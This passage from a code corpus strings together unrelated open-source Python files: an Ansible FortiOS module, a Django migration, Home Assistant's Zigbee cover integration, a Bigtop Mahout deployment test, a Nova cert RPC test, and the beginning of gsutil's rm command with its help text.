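    # Recursively rewrite dict keys from Ansible's underscore style to the
    # hyphenated names the FortiOS REST API expects
    # (e.g. ssl_min_version -> ssl-min-version).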
if isinstance(data, list):
for i, elem in enumerate(data):
data[i] = underscore_to_hyphen(elem)
elif isinstance(data, dict):
new_data = {}
for k, v in data.items():
new_data[k.replace('_', '-')] = underscore_to_hyphen(v)
data = new_data
return data
def firewall_ssl_server(data, fos):
vdom = data['vdom']
if 'state' in data and data['state']:
state = data['state']
    elif 'state' in data['firewall_ssl_server'] and data['firewall_ssl_server']['state']:
state = data['firewall_ssl_server']['state']
else:
state = True
firewall_ssl_server_data = data['firewall_ssl_server']
filtered_data = underscore_to_hyphen(filter_firewall_ssl_server_data(firewall_ssl_server_data))
if state == "present":
return fos.set('firewall',
'ssl-server',
data=filtered_data,
vdom=vdom)
elif state == "absent":
return fos.delete('firewall',
'ssl-server',
mkey=filtered_data['name'],
vdom=vdom)
def is_successful_status(status):
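    # A DELETE that returns 404 is treated as success: the object is
    # already absent.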
return status['status'] == "success" or \
status['http_method'] == "DELETE" and status['http_status'] == 404
def fortios_firewall(data, fos):
if data['firewall_ssl_server']:
resp = firewall_ssl_server(data, fos)
return not is_successful_status(resp), \
resp['status'] == "success", \
resp
def main():
fields = {
"host": {"required": False, "type": "str"},
"username": {"required": False, "type": "str"},
"password": {"required": False, "type": "str", "default": "", "no_log": True},
"vdom": {"required": False, "type": "str", "default": "root"},
"https": {"required": False, "type": "bool", "default": True},
"ssl_verify": {"required": False, "type": "bool", "default": True},
"state": {"required": False, "type": "str",
"choices": ["present", "absent"]},
"firewall_ssl_server": {
"required": False, "type": "dict", "default": None,
"options": {
"state": {"required": False, "type": "str",
"choices": ["present", "absent"]},
"add_header_x_forwarded_proto": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"ip": {"required": False, "type": "str"},
"mapped_port": {"required": False, "type": "int"},
"name": {"required": True, "type": "str"},
"port": {"required": False, "type": "int"},
"ssl_algorithm": {"required": False, "type": "str",
"choices": ["high", "medium", "low"]},
"ssl_cert": {"required": False, "type": "str"},
"ssl_client_renegotiation": {"required": False, "type": "str",
"choices": ["allow", "deny", "secure"]},
"ssl_dh_bits": {"required": False, "type": "str",
"choices": ["768", "1024", "1536",
"2048"]},
"ssl_max_version": {"required": False, "type": "str",
"choices": ["tls-1.0", "tls-1.1", "tls-1.2"]},
"ssl_min_version": {"required": False, "type": "str",
"choices": ["tls-1.0", "tls-1.1", "tls-1.2"]},
"ssl_mode": {"required": False, "type": "str",
"choices": ["half", "full"]},
"ssl_send_empty_frags": {"required": False, "type": "str",
"choices": ["enable", "disable"]},
"url_rewrite": {"required": False, "type": "str",
"choices": ["enable", "disable"]}
}
}
}
module = AnsibleModule(argument_spec=fields,
supports_check_mode=False)
# legacy_mode refers to using fortiosapi instead of HTTPAPI
legacy_mode = 'host' in module.params and module.params['host'] is not None and \
'username' in module.params and module.params['username'] is not None and \
'password' in module.params and module.params['password'] is not None
if not legacy_mode:
if module._socket_path:
connection = Connection(module._socket_path)
fos = FortiOSHandler(connection)
is_error, has_changed, result = fortios_firewall(module.params, fos)
else:
module.fail_json(**FAIL_SOCKET_MSG)
else:
try:
from fortiosapi import FortiOSAPI
except ImportError:
module.fail_json(msg="fortiosapi module is required")
fos = FortiOSAPI()
login(module.params, fos)
is_error, has_changed, result = fortios_firewall(module.params, fos)
fos.logout()
if not is_error:
module.exit_json(changed=has_changed, meta=result)
else:
module.fail_json(msg="Error in repo", meta=result)
if __name__ == '__main__':
main()
| simonwydooghe/ansible | lib/ansible/modules/network/fortios/fortios_firewall_ssl_server.py | Python | gpl-3.0 | 15,241 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
from django.contrib.auth.models import User
from account.models import Account
class Migration(DataMigration):
def forwards(self, orm):
# we need to associate each user to an account object
for user in User.objects.all():
a = Account()
a.user = user
a.language = 'en' # default language
a.save()
def backwards(self, orm):
# we need to delete all the accounts records
Account.objects.all().delete()
models = {
'actstream.action': {
'Meta': {'ordering': "('-timestamp',)", 'object_name': 'Action'},
'action_object_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'action_object'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'action_object_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'actor_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actor'", 'to': "orm['contenttypes.ContentType']"}),
'actor_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'data': ('jsonfield.fields.JSONField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'target_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'target'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'target_object_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 1, 14, 4, 17, 6, 973224)'}),
'verb': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 1, 14, 4, 17, 6, 974570)'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2013, 1, 14, 4, 17, 6, 974509)'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'relationships': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_to'", 'symmetrical': 'False', 'through': "orm['relationships.Relationship']", 'to': "orm['auth.User']"}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'people.profile': {
'Meta': {'object_name': 'Profile'},
'area': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'blank': 'True'}),
'delivery': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'fax': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'organization': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'position': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'profile': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'profile'", 'unique': 'True', 'null': 'True', 'to': "orm['auth.User']"}),
'voice': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'zipcode': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'people.role': {
'Meta': {'object_name': 'Role'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'})
},
'relationships.relationship': {
'Meta': {'ordering': "('created',)", 'unique_together': "(('from_user', 'to_user', 'status', 'site'),)", 'object_name': 'Relationship'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_users'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'related_name': "'relationships'", 'to': "orm['sites.Site']"}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['relationships.RelationshipStatus']"}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_users'", 'to': "orm['auth.User']"}),
'weight': ('django.db.models.fields.FloatField', [], {'default': '1.0', 'null': 'True', 'blank': 'True'})
},
'relationships.relationshipstatus': {
'Meta': {'ordering': "('name',)", 'object_name': 'RelationshipStatus'},
'from_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'private': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'symmetrical_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'to_slug': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'verb': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['people']
| GISPPU/GrenadaLandInformation | geonode/people/migrations/0003_link_users_to_account.py | Python | gpl-3.0 | 10,196 |
"""Support for ZHA covers."""
from __future__ import annotations
import asyncio
import functools
import logging
from zigpy.zcl.foundation import Status
from homeassistant.components.cover import (
ATTR_CURRENT_POSITION,
ATTR_POSITION,
DEVICE_CLASS_DAMPER,
DEVICE_CLASS_SHADE,
DOMAIN,
CoverEntity,
)
from homeassistant.const import STATE_CLOSED, STATE_CLOSING, STATE_OPEN, STATE_OPENING
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .core import discovery
from .core.const import (
CHANNEL_COVER,
CHANNEL_LEVEL,
CHANNEL_ON_OFF,
CHANNEL_SHADE,
DATA_ZHA,
DATA_ZHA_DISPATCHERS,
SIGNAL_ADD_ENTITIES,
SIGNAL_ATTR_UPDATED,
SIGNAL_SET_LEVEL,
)
from .core.registries import ZHA_ENTITIES
from .core.typing import ChannelType, ZhaDeviceType
from .entity import ZhaEntity
_LOGGER = logging.getLogger(__name__)
STRICT_MATCH = functools.partial(ZHA_ENTITIES.strict_match, DOMAIN)
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Zigbee Home Automation cover from config entry."""
entities_to_create = hass.data[DATA_ZHA][DOMAIN]
unsub = async_dispatcher_connect(
hass,
SIGNAL_ADD_ENTITIES,
functools.partial(
discovery.async_add_entities, async_add_entities, entities_to_create
),
)
hass.data[DATA_ZHA][DATA_ZHA_DISPATCHERS].append(unsub)
@STRICT_MATCH(channel_names=CHANNEL_COVER)
class ZhaCover(ZhaEntity, CoverEntity):
"""Representation of a ZHA cover."""
def __init__(self, unique_id, zha_device, channels, **kwargs):
"""Init this sensor."""
super().__init__(unique_id, zha_device, channels, **kwargs)
self._cover_channel = self.cluster_channels.get(CHANNEL_COVER)
self._current_position = None
async def async_added_to_hass(self):
"""Run when about to be added to hass."""
await super().async_added_to_hass()
self.async_accept_signal(
self._cover_channel, SIGNAL_ATTR_UPDATED, self.async_set_position
)
@callback
def async_restore_last_state(self, last_state):
"""Restore previous state."""
self._state = last_state.state
if "current_position" in last_state.attributes:
self._current_position = last_state.attributes["current_position"]
@property
def is_closed(self):
"""Return if the cover is closed."""
if self.current_cover_position is None:
return None
return self.current_cover_position == 0
@property
def is_opening(self):
"""Return if the cover is opening or not."""
return self._state == STATE_OPENING
@property
def is_closing(self):
"""Return if the cover is closing or not."""
return self._state == STATE_CLOSING
@property
def current_cover_position(self):
"""Return the current position of ZHA cover.
None is unknown, 0 is closed, 100 is fully open.
"""
return self._current_position
@callback
def async_set_position(self, attr_id, attr_name, value):
"""Handle position update from channel."""
_LOGGER.debug("setting position: %s", value)
self._current_position = 100 - value
if self._current_position == 0:
self._state = STATE_CLOSED
elif self._current_position == 100:
self._state = STATE_OPEN
self.async_write_ha_state()
@callback
def async_update_state(self, state):
"""Handle state update from channel."""
_LOGGER.debug("state=%s", state)
self._state = state
self.async_write_ha_state()
async def async_open_cover(self, **kwargs):
"""Open the window cover."""
res = await self._cover_channel.up_open()
if isinstance(res, list) and res[1] is Status.SUCCESS:
self.async_update_state(STATE_OPENING)
async def async_close_cover(self, **kwargs):
"""Close the window cover."""
res = await self._cover_channel.down_close()
if isinstance(res, list) and res[1] is Status.SUCCESS:
self.async_update_state(STATE_CLOSING)
async def async_set_cover_position(self, **kwargs):
"""Move the roller shutter to a specific position."""
new_pos = kwargs[ATTR_POSITION]
res = await self._cover_channel.go_to_lift_percentage(100 - new_pos)
if isinstance(res, list) and res[1] is Status.SUCCESS:
self.async_update_state(
STATE_CLOSING if new_pos < self._current_position else STATE_OPENING
)
async def async_stop_cover(self, **kwargs):
"""Stop the window cover."""
res = await self._cover_channel.stop()
if isinstance(res, list) and res[1] is Status.SUCCESS:
self._state = STATE_OPEN if self._current_position > 0 else STATE_CLOSED
self.async_write_ha_state()
async def async_update(self):
"""Attempt to retrieve the open/close state of the cover."""
await super().async_update()
await self.async_get_state()
async def async_get_state(self, from_cache=True):
"""Fetch the current state."""
_LOGGER.debug("polling current state")
if self._cover_channel:
pos = await self._cover_channel.get_attribute_value(
"current_position_lift_percentage", from_cache=from_cache
)
_LOGGER.debug("read pos=%s", pos)
if pos is not None:
self._current_position = 100 - pos
self._state = (
STATE_OPEN if self.current_cover_position > 0 else STATE_CLOSED
)
else:
self._current_position = None
self._state = None
@STRICT_MATCH(channel_names={CHANNEL_LEVEL, CHANNEL_ON_OFF, CHANNEL_SHADE})
class Shade(ZhaEntity, CoverEntity):
"""ZHA Shade."""
_attr_device_class = DEVICE_CLASS_SHADE
def __init__(
self,
unique_id: str,
zha_device: ZhaDeviceType,
channels: list[ChannelType],
**kwargs,
) -> None:
"""Initialize the ZHA light."""
super().__init__(unique_id, zha_device, channels, **kwargs)
self._on_off_channel = self.cluster_channels[CHANNEL_ON_OFF]
self._level_channel = self.cluster_channels[CHANNEL_LEVEL]
self._position = None
self._is_open = None
@property
def current_cover_position(self):
"""Return current position of cover.
None is unknown, 0 is closed, 100 is fully open.
"""
return self._position
@property
def is_closed(self) -> bool | None:
"""Return True if shade is closed."""
if self._is_open is None:
return None
return not self._is_open
async def async_added_to_hass(self):
"""Run when about to be added to hass."""
await super().async_added_to_hass()
self.async_accept_signal(
self._on_off_channel, SIGNAL_ATTR_UPDATED, self.async_set_open_closed
)
self.async_accept_signal(
self._level_channel, SIGNAL_SET_LEVEL, self.async_set_level
)
@callback
def async_restore_last_state(self, last_state):
"""Restore previous state."""
self._is_open = last_state.state == STATE_OPEN
if ATTR_CURRENT_POSITION in last_state.attributes:
self._position = last_state.attributes[ATTR_CURRENT_POSITION]
@callback
def async_set_open_closed(self, attr_id: int, attr_name: str, value: bool) -> None:
"""Set open/closed state."""
self._is_open = bool(value)
self.async_write_ha_state()
@callback
def async_set_level(self, value: int) -> None:
"""Set the reported position."""
value = max(0, min(255, value))
self._position = int(value * 100 / 255)
self.async_write_ha_state()
async def async_open_cover(self, **kwargs):
"""Open the window cover."""
res = await self._on_off_channel.on()
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't open cover: %s", res)
return
self._is_open = True
self.async_write_ha_state()
async def async_close_cover(self, **kwargs):
"""Close the window cover."""
res = await self._on_off_channel.off()
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't open cover: %s", res)
return
self._is_open = False
self.async_write_ha_state()
async def async_set_cover_position(self, **kwargs):
"""Move the roller shutter to a specific position."""
new_pos = kwargs[ATTR_POSITION]
res = await self._level_channel.move_to_level_with_on_off(
new_pos * 255 / 100, 1
)
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't set cover's position: %s", res)
return
self._position = new_pos
self.async_write_ha_state()
async def async_stop_cover(self, **kwargs) -> None:
"""Stop the cover."""
res = await self._level_channel.stop()
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't stop cover: %s", res)
return
@STRICT_MATCH(
channel_names={CHANNEL_LEVEL, CHANNEL_ON_OFF}, manufacturers="Keen Home Inc"
)
class KeenVent(Shade):
"""Keen vent cover."""
_attr_device_class = DEVICE_CLASS_DAMPER
async def async_open_cover(self, **kwargs):
"""Open the cover."""
position = self._position or 100
tasks = [
self._level_channel.move_to_level_with_on_off(position * 255 / 100, 1),
self._on_off_channel.on(),
]
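        # Issue the level and on/off commands concurrently; an exception in
        # either result is treated as a failed open.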
results = await asyncio.gather(*tasks, return_exceptions=True)
if any(isinstance(result, Exception) for result in results):
self.debug("couldn't open cover")
return
self._is_open = True
self._position = position
self.async_write_ha_state()
| lukas-hetzenecker/home-assistant | homeassistant/components/zha/cover.py | Python | apache-2.0 | 10,222 |
#!/usr/bin/env python3
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import amulet
class TestDeploy(unittest.TestCase):
"""
Deployment and smoke test for Apache Bigtop Mahout.
"""
@classmethod
def setUpClass(cls):
cls.d = amulet.Deployment(series='xenial')
cls.d.add('mahout')
cls.d.add('client', charm='hadoop-client')
cls.d.add('namenode', charm='hadoop-namenode')
cls.d.add('resourcemanager', charm='hadoop-resourcemanager')
cls.d.add('slave', charm='hadoop-slave')
cls.d.add('plugin', charm='hadoop-plugin')
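        # Wire the Hadoop components together; Mahout itself only needs the
        # client relation established below.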
cls.d.relate('plugin:hadoop-plugin', 'client:hadoop')
cls.d.relate('plugin:namenode', 'namenode:namenode')
cls.d.relate('plugin:resourcemanager', 'resourcemanager:resourcemanager')
cls.d.relate('slave:namenode', 'namenode:datanode')
cls.d.relate('slave:resourcemanager', 'resourcemanager:nodemanager')
cls.d.relate('namenode:namenode', 'resourcemanager:namenode')
cls.d.relate('mahout:mahout', 'client:mahout')
cls.d.setup(timeout=3600)
cls.d.sentry.wait_for_messages({"mahout": "ready"}, timeout=3600)
cls.mahout = cls.d.sentry['mahout'][0]
def test_mahout(self):
"""
Validate Mahout by running the smoke-test action.
"""
uuid = self.mahout.run_action('smoke-test')
result = self.d.action_fetch(uuid, full_output=True)
# action status=completed on success
if (result['status'] != "completed"):
self.fail('Mahout smoke-test failed: %s' % result)
if __name__ == '__main__':
unittest.main()
| welikecloud/bigtop | bigtop-packages/src/charm/mahout/layer-mahout/tests/01-mahout-test.py | Python | apache-2.0 | 2,393 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012, Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit Tests for nova.cert.rpcapi
"""
from nova.cert import rpcapi as cert_rpcapi
from nova import context
from nova import flags
from nova.openstack.common import rpc
from nova import test
FLAGS = flags.FLAGS
class CertRpcAPITestCase(test.TestCase):
def setUp(self):
super(CertRpcAPITestCase, self).setUp()
def tearDown(self):
super(CertRpcAPITestCase, self).tearDown()
def _test_cert_api(self, method, **kwargs):
ctxt = context.RequestContext('fake_user', 'fake_project')
rpcapi = cert_rpcapi.CertAPI()
expected_retval = 'foo'
expected_msg = rpcapi.make_msg(method, **kwargs)
expected_msg['version'] = rpcapi.BASE_RPC_API_VERSION
self.call_ctxt = None
self.call_topic = None
self.call_msg = None
self.call_timeout = None
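        # Stub rpc.call so the test can capture the context, topic, message,
        # and timeout that the API layer passes through.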
def _fake_call(_ctxt, _topic, _msg, _timeout):
self.call_ctxt = _ctxt
self.call_topic = _topic
self.call_msg = _msg
self.call_timeout = _timeout
return expected_retval
self.stubs.Set(rpc, 'call', _fake_call)
retval = getattr(rpcapi, method)(ctxt, **kwargs)
self.assertEqual(retval, expected_retval)
self.assertEqual(self.call_ctxt, ctxt)
self.assertEqual(self.call_topic, FLAGS.cert_topic)
self.assertEqual(self.call_msg, expected_msg)
self.assertEqual(self.call_timeout, None)
def test_revoke_certs_by_user(self):
self._test_cert_api('revoke_certs_by_user', user_id='fake_user_id')
def test_revoke_certs_by_project(self):
self._test_cert_api('revoke_certs_by_project',
project_id='fake_project_id')
def test_revoke_certs_by_user_and_project(self):
self._test_cert_api('revoke_certs_by_user_and_project',
user_id='fake_user_id',
project_id='fake_project_id')
def test_generate_x509_cert(self):
self._test_cert_api('generate_x509_cert',
user_id='fake_user_id',
project_id='fake_project_id')
def test_fetch_ca(self):
self._test_cert_api('fetch_ca', project_id='fake_project_id')
def test_fetch_crl(self):
self._test_cert_api('fetch_crl', project_id='fake_project_id')
def test_decrypt_text(self):
self._test_cert_api('decrypt_text',
project_id='fake_project_id', text='blah')
| tylertian/Openstack | openstack F/nova/nova/tests/cert/test_rpcapi.py | Python | apache-2.0 | 3,147 |
# -*- coding: utf-8 -*-
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of Unix-like rm command for cloud storage providers."""
from __future__ import absolute_import
import time
from gslib.cloud_api import BucketNotFoundException
from gslib.cloud_api import NotEmptyException
from gslib.cloud_api import NotFoundException
from gslib.cloud_api import ServiceException
from gslib.command import Command
from gslib.command import DecrementFailureCount
from gslib.command_argument import CommandArgument
from gslib.cs_api_map import ApiSelector
from gslib.exception import CommandException
from gslib.exception import NO_URLS_MATCHED_GENERIC
from gslib.exception import NO_URLS_MATCHED_TARGET
from gslib.name_expansion import NameExpansionIterator
from gslib.name_expansion import SeekAheadNameExpansionIterator
from gslib.parallelism_framework_util import PutToQueueWithTimeout
from gslib.storage_url import StorageUrlFromString
from gslib.thread_message import MetadataMessage
from gslib.translation_helper import PreconditionsFromHeaders
from gslib.util import GetCloudApiInstance
from gslib.util import NO_MAX
from gslib.util import Retry
from gslib.util import StdinIterator
_SYNOPSIS = """
gsutil rm [-f] [-r] url...
gsutil rm [-f] [-r] -I
"""
_DETAILED_HELP_TEXT = ("""
<B>SYNOPSIS</B>
""" + _SYNOPSIS + """
<B>DESCRIPTION</B>
The gsutil rm command removes objects.
For example, the command:
gsutil rm gs://bucket/subdir/*
will remove all objects in gs://bucket/subdir, but not in any of its
sub-directories. In contrast:
gsutil rm gs://bucket/subdir/**
will remove all objects under gs://bucket/subdir or any of its
subdirectories.
You can also use the -r option to specify recursive object deletion. Thus, for
example, either of the following two commands will remove gs://bucket/subdir
and all objects and subdirectories under it:
gsutil rm gs://bucket/subdir**
gsutil rm -r gs://bucket/subdir
The -r option will also delete all object versions in the subdirectory for
versioning-enabled buckets, whereas the ** command will only delete the live
version of each object in the subdirectory.
Running gsutil rm -r on a bucket will delete all versions of all objects in
the bucket, and then delete the bucket:
gsutil rm -r gs://bucket
If you want to delete all objects in the bucket, but not the bucket itself,
this command will work:
gsutil rm gs://bucket/**
If you have a large number of objects to remove you might want to use the
gsutil -m option, to perform parallel (multi-threaded/multi-processing)
removes:
gsutil -m rm -r gs://my_bucket/subdir
You can pass a list of URLs (one per line) to remove on stdin instead of as
command line arguments by using the -I option. This allows you to use gsutil
in a pipeline to remove objects identified by a program, such as:
some_program | gsutil -m rm -I
The contents of stdin can name cloud URLs and wildcards of cloud URLs.
Note that gsutil rm will refuse to remove files from the local
file system. For example this will fail:
gsutil rm *.txt
WARNING: Object removal cannot be undone. Google Cloud Storage is designed
to give developers a high amount of flexibility and control over their data,
and Google maintains strict controls over the processing and purging of
deleted data. To protect yourself from mistakes, you can configure object
versioning on your bucket(s). See 'gsutil help versions' for details.
<B>DATA RESTORATION FROM ACCIDENTAL DELETION OR OVERWRITES</B>
Google Cloud Storage does not provide support for restoring data lost
or overwritten due to customer errors. If you have concerns that your
application software (or your users) may at some point erroneously delete or
overwrite data, you can protect yourself from that risk by enabling Object
Versioning (see "gsutil help versioning"). Doing so increases storage costs,
which can be partially mitigated by configuring Lifecycle Management to delete
older object versions (see "gsutil help lifecycle").
<B>OPTIONS</B>
-f Continues silently (without printing error messages) despite
errors when removing multiple objects. If some of the objects
could not be removed, gsutil's exit status will be non-zero even
if this flag is set. Execution will still halt if an inaccessible
bucket is encountered. This option is implicitly set when running
"gsutil -m rm ...".
-I Causes gsutil to read the list of objects to remove from stdin.
This allows you to run a program that generates the list of
objects to remove.
-R, -r The -R and -r options are synonymous. Causes bucket or bucket
subdirectory contents (all objects and subdirectories that it
contains) to be removed recursively. If used with a bucket-only
URL (like gs://bucket), after deleting objects and subdirectories
gsutil will delete the bucket. This option implies the -a option
and will delete all object versions.
-a Delete all versions of an object.
""")
def _RemoveExceptionHandler(cls, e):
"""Simple exception handler to allow post-completion status."""
if not cls.continue_on_error:
cls.logger.error(str(e))
# TODO: Use shared state to track missing bucket names when we get a
# BucketNotFoundException. Then improve bucket removal logic and exception
# messages.
if isinstance(e, BucketNotFoundException):
cls.bucket_not_found_count += 1
cls.logger.error(str(e))
else:
if _ExceptionMatchesBucketToDelete(cls.bucket_strings_to_delete, e):
DecrementFailureCount()
else:
cls.op_failure_count += 1
# pylint: disable=unused-argument
def _RemoveFoldersExceptionHandler(cls, e):
"""When removing folders, we don't mind if none exist."""
if ((isinstance(e, CommandException) and
NO_URLS_MATCHED_GENERIC in e.reason)
or isinstance(e, NotFoundException)):
DecrementFailureCount()
else:
raise e
def _RemoveFuncWrapper(cls, name_expansion_result, thread_state=None):
cls.RemoveFunc(name_expansion_result, thread_state=thread_state)
def _ExceptionMatchesBucketToDelete(bucket_strings_to_delete, e):
"""Returns True if the exception matches a bucket slated for deletion.
A recursive delete call on an empty bucket will raise an exception when
listing its objects, but if we plan to delete the bucket that shouldn't
result in a user-visible error.
Args:
bucket_strings_to_delete: Buckets slated for recursive deletion.
e: Exception to check.
Returns:
True if the exception was a no-URLs-matched exception and it matched
one of bucket_strings_to_delete, None otherwise.
"""
if bucket_strings_to_delete:
msg = NO_URLS_MATCHED_TARGET % ''
if msg in str(e):
parts = str(e).split(msg)
return len(parts) == 2 and parts[1] in bucket_strings_to_delete
class RmCommand(Command):
"""Implementation of gsutil rm command."""
# Command specification. See base class for documentation.
command_spec = Command.CreateCommandSpec(
'rm',
command_name_aliases=['del', 'delete', 'remove'],
usage_synopsis=_SYNOPSIS,
min_args=0,
max_args=NO_MAX,
supported_sub_args='afIrR',
file_url_ok=False,
